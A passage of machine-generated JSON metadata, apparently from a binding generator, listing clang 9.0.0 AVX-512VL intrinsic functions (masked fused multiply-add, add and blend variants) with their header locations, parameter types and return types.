"location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1134:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask3_fmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1144:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_fmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1154:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask_fmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1164:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_fmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1174:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask3_fnmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1184:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_fnmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1194:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_fnmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1204:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_fmaddsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1214:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask3_fmaddsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1224:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_fmaddsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1234:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_fmsubadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1244:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_fmsubadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1254:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_fmaddsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1264:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask3_fmaddsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1274:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_fmaddsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1284:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask_fmsubadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1294:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_fmsubadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1304:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_fmaddsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1314:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask3_fmaddsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1324:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_fmaddsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1334:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_fmsubadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1344:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_fmsubadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1354:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_fmaddsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1364:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask3_fmaddsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1375:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_fmaddsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1385:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask_fmsubadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1395:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_fmsubadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1405:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask3_fmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1415:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask3_fmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1425:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask3_fmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1435:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask3_fmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1445:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask3_fmsubadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1455:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask3_fmsubadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1465:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask3_fmsubadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1475:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask3_fmsubadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1485:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_fnmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1495:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_fnmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1505:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_fnmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1515:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_fnmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1525:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_fnmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1535:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask3_fnmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1545:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_fnmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1555:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask3_fnmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1565:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_fnmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1575:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask3_fnmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1585:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_fnmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1595:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask3_fnmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1605:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_add_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1615:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_add_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1622:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_add_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1629:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_add_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1636:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_add_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1643:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_add_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1650:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_add_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1657:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_add_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1664:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_blend_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1671:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_blend_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1678:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_blend_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1685:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_blend_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1692:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } 